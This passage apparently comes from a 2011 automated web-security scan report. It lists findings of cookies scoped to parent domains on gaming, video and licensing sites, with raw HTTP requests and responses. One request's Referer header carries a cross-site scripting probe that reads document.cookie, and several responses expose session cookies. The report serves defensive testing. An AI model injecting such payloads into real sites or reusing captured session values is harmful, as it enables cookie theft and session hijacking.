10.2. http://www.lga.org.mt/lga/home.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lga.org.mt
Path:   /lga/home.aspx

Request

GET /lga/home.aspx HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=3cjspfm1kdxdaju4khdahw45; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <TITLE>Lotteries and Gaming Authority .. 2008 </TITLE>
       <meta content="Lo
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="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" />
...[SNIP]...

11. Cookie scoped to parent domain
There are 244 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie header, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


11.1. http://api.twitter.com/1/Metacafe/lists/metacafe/statuses.json

Summary

Severity:   Low
Confidence:   Firm
Host:   http://api.twitter.com
Path:   /1/Metacafe/lists/metacafe/statuses.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/Metacafe/lists/metacafe/statuses.json?callback=TWTR.Widget.receiveCallback_1&include_rts=true&clientsource=TWITTERINC_WIDGET&1305550175438=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: k=173.193.214.243.1305305564166059; guest_id=130530556419951159; __utmz=43838368.1305368954.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.1598605414.1305368954.1305368954.1305412459.2

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:36 GMT
Server: hi
Status: 200 OK
X-Transaction: 1305550176-17470-26551
X-RateLimit-Limit: 150
ETag: "e5d1cb505007380f6115cd2151534fc1"-gzip
X-Frame-Options: SAMEORIGIN
Last-Modified: Mon, 16 May 2011 12:49:36 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.04505
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114be3e990c
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 13f34ed7cc97704ba4dad483c845028cdf545995
X-RateLimit-Reset: 1305553776
Set-Cookie: original_referer=ZLhHHTiegr%2BuELNlzhqsTmXCAErbgtcXGmlVl75vKClzAZioSrWmX1f0QknK5wh8oE41IPFgvC8H5lwFMcpBvsbGUrM2CLCfSyyLTsrrntY99PQJLtdZtZXzC2SKRGyfMlLDL2xkw2ifyAgy%2BYKs1A%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCCbC2vgvAToHaWQiJTU3YWEwODgzYzhmNDJk%250AZWNjODAyY2IxOWMyZDIzYzEzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--bb094e11ffa55fe4d38d2f1900f6149571445d42; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35019

TWTR.Widget.receiveCallback_1([{"retweet_count":0,"in_reply_to_status_id":null,"text":"Raised in the circus, perpetually homeless, and always fabulous, meet one of pop's most dynamic rising stars. htt
...[SNIP]...

11.2. http://br.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://br.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: br.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=b8ce8h87e1pqll04kbcnv4sh36; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=br; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=br; expires=Wed, 15-Jun-2011 12:45:26 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123651; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=541024; expires=Tue, 15-May-2012 12:45:27 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:45:29 GMT
Connection: close
Content-Length: 23207

<!DOCTYPE html>
<html dir="ltr" lang="pt-BR">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - O melhor lugar para jogos de dinheiro online!..| Winnings.com</title>
<link rel="alternate"
...[SNIP]...

11.3. http://da.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://da.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: da.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=82gun5s9aot32rckk6dr6ngt71; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=da; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=da; expires=Wed, 15-Jun-2011 12:26:09 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123277; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540655; expires=Tue, 15-May-2012 12:26:10 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:11 GMT
Connection: close
Content-Length: 23111

<!DOCTYPE html>
<html dir="ltr" lang="da">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Det bedste sted for SJOV online underholdning med gevinster!..| Winnings.com</title>
<link rel="
...[SNIP]...

11.4. http://de.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://de.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: de.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=bo2hr723r5jhqb7k8l55c0tsp6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=de; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=de; expires=Wed, 15-Jun-2011 12:00:01 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103122867; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540255; expires=Tue, 15-May-2012 12:00:03 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:00:04 GMT
Connection: close
Content-Length: 23256

<!DOCTYPE html>
<html dir="ltr" lang="de-DE">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Top-Destination f..r SPASS Online Winnings Unterhaltung!..| Winnings.com</title>
<link rel="a
...[SNIP]...

11.5. http://el.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://el.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: el.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=m2prtrifja8qi72631j36fguj0; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=el; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=el; expires=Wed, 15-Jun-2011 12:08:42 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123004; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540388; expires=Tue, 15-May-2012 12:08:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:08:47 GMT
Connection: close
Content-Length: 24824

<!DOCTYPE html>
<html dir="ltr" lang="el">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - .. #1 .................... ...... .................... ...... .................. .... ..........
...[SNIP]...

11.6. http://es.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://es.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: es.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=6rfpoaacmos3pqv6u74edo7v02; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=es; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=es; expires=Wed, 15-Jun-2011 12:32:12 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123528; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540903; expires=Tue, 15-May-2012 12:32:13 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:32:15 GMT
Connection: close
Content-Length: 23226

<!DOCTYPE html>
<html dir="ltr" lang="es-ES">
<head>
<meta charset="UTF-8" />

<title>Winnings.com. ..El destino n.. 1 para la DIVERSI..N y ganancias online!..| Winnings.com</title>
<link rel="a
...[SNIP]...

11.7. http://fi.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fi.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fi.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=hhfnpksu4siu4pfgu3cjt3vs45; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=fi; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=fi; expires=Wed, 15-Jun-2011 12:10:54 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123051; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540431; expires=Tue, 15-May-2012 12:10:55 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:10:56 GMT
Connection: close
Content-Length: 23175

<!DOCTYPE html>
<html dir="ltr" lang="fi">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Ykk..spaikka HAUSKALLE netin Winnings -viihteelle!..| Winnings.com</title>
<link rel="alternate
...[SNIP]...

11.8. http://fr.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://fr.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: fr.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=ct2se4ekv495kv3bi8qnrrbis5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=fr; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=fr; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123274; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540651; expires=Tue, 15-May-2012 12:26:04 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:26:05 GMT
Connection: close
Content-Length: 23634

<!DOCTYPE html>
<html dir="ltr" lang="fr-FR">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - La Destination #1 pour du Divertissement Gagnant En Ligne !..| Winnings.com</title>
<link r
...[SNIP]...

11.9. http://nl.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://nl.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: nl.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=9jhkgdc329m3l6ckield5tnpl7; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=nl; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=nl; expires=Wed, 15-Jun-2011 12:24:15 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123202; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540579; expires=Tue, 15-May-2012 12:24:16 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:18 GMT
Connection: close
Content-Length: 23134

<!DOCTYPE html>
<html dir="ltr" lang="nl-NL">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - De #1 bestemming voor PRET met online Winnings amusement!..| Winnings.com</title>
<link rel=
...[SNIP]...

11.10. http://no.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://no.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: no.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=tg684evsvkmguaeu71dlpar7c5; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=no; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=no; expires=Wed, 15-Jun-2011 12:24:19 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123206; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540583; expires=Tue, 15-May-2012 12:24:21 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:24:22 GMT
Connection: close
Content-Length: 23083

<!DOCTYPE html>
<html dir="ltr" lang="no">
<head>
<meta charset="UTF-8" />

<title>Winnings.com ... Det Beste Stedet for G..YAL Online Spilleunderholdning!..| Winnings.com</title>
<link rel="alt
...[SNIP]...

11.11. http://pt.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pt.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: pt.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=mi99ov4036kkfgf2v89k0a5qg6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=pt; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=pt; expires=Wed, 15-Jun-2011 12:23:56 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123196; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540573; expires=Tue, 15-May-2012 12:23:57 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:23:58 GMT
Connection: close
Content-Length: 23185

<!DOCTYPE html>
<html dir="ltr" lang="pt-PT">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - O Destino #1 para Entretenimento e Ganhos Online!..| Winnings.com</title>
<link rel="alternat
...[SNIP]...

11.12. http://sv.winnings.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://sv.winnings.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: sv.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=nr3a3rsougqdtponk6jao9tic6; path=/; domain=.winnings.com
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=winnings.com
Set-Cookie: winnings[subdomain]=sv; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[cc]=US; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[lang]=sv; expires=Wed, 15-Jun-2011 12:33:43 GMT; path=/; domain=.winnings.com
Set-Cookie: winnings[sessionId]=103123554; path=/; domain=.winnings.com
Set-Cookie: winnings[vid]=540929; expires=Tue, 15-May-2012 12:33:44 GMT; path=/; domain=.winnings.com
X-Pingback: http://winnings.com/xmlrpc.php
Date: Mon, 16 May 2011 12:33:44 GMT
Connection: close
Content-Length: 23007

<!DOCTYPE html>
<html dir="ltr" lang="sv-SE">
<head>
<meta charset="UTF-8" />

<title>Winnings.com - Plats #1 f..r ROLIG Vinstrik Onlineunderh..llning!..| Winnings.com</title>
<link rel="alterna
...[SNIP]...

11.13. http://www.metacafe.com/fplayer/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.metacafe.com
Path:   /fplayer/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /fplayer/ HTTP/1.1
Host: www.metacafe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CUR ADM OUR NOR STA NID"
Content-Type: text/html
Date: Mon, 16 May 2011 12:25:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=b34cef86fb081c11b18f1c7533ccdcf4; path=/; domain=.metacafe.com
Set-Cookie: OAGEO=US%7CTX%7CDallas%7C75207%7C32.7825%7C-96.8207%7C623%7C214%7C%7C%7C; path=/; domain=.metacafe.com
Set-Cookie: OAID=b26d5505ed27474ffea988f3d3dd0b02; expires=Tue, 15-May-2012 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: User=%7B%22sc%22%3A1%2C%22visitID%22%3A%228744ed5d828ea0d23416bbe1e22d1055%22%2C%22LEID%22%3A40%2C%22LangID%22%3A%22en%22%2C%22npUserLocations%22%3A%5B244%5D%2C%22npUserLanguages%22%3A%5B9%5D%2C%22ffilter%22%3Atrue%2C%22pve%22%3A1%2C%22fbconnected%22%3Afalse%7D; expires=Sat, 14-May-2016 12:25:14 GMT; path=/; domain=.metacafe.com
Set-Cookie: dsavip=3333427372.20480.0000; expires=Mon, 16-May-2011 13:25:14 GMT; path=/
Content-Length: 73965

           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
           <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.faceboo
...[SNIP]...

11.14. http://www.opensource.org/licenses/mit-license.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:17 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8n DAV/2 SVN/1.6.16
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=51jln3d46i68pj609s4i8oat56; expires=Wed, 08-Jun-2011 16:18:37 GMT; path=/; domain=.opensource.org
Last-Modified: Mon, 16 May 2011 12:32:15 GMT
ETag: "683ef92c05accf8dc3002cfa2d153539"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 20417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...

11.15. http://www.vincite.net/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vincite.net
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?vid=540129 HTTP/1.1
Host: www.vincite.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
ETag: ""
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.13
Set-Cookie: WinningsSID=v0b5gg3j3lfm7o3fa7sric4bp6; path=/; domain=.vincite.net
Set-Cookie: qtrans_cookie_test=qTranslate+Cookie+Test; path=/; domain=www.vincite.net
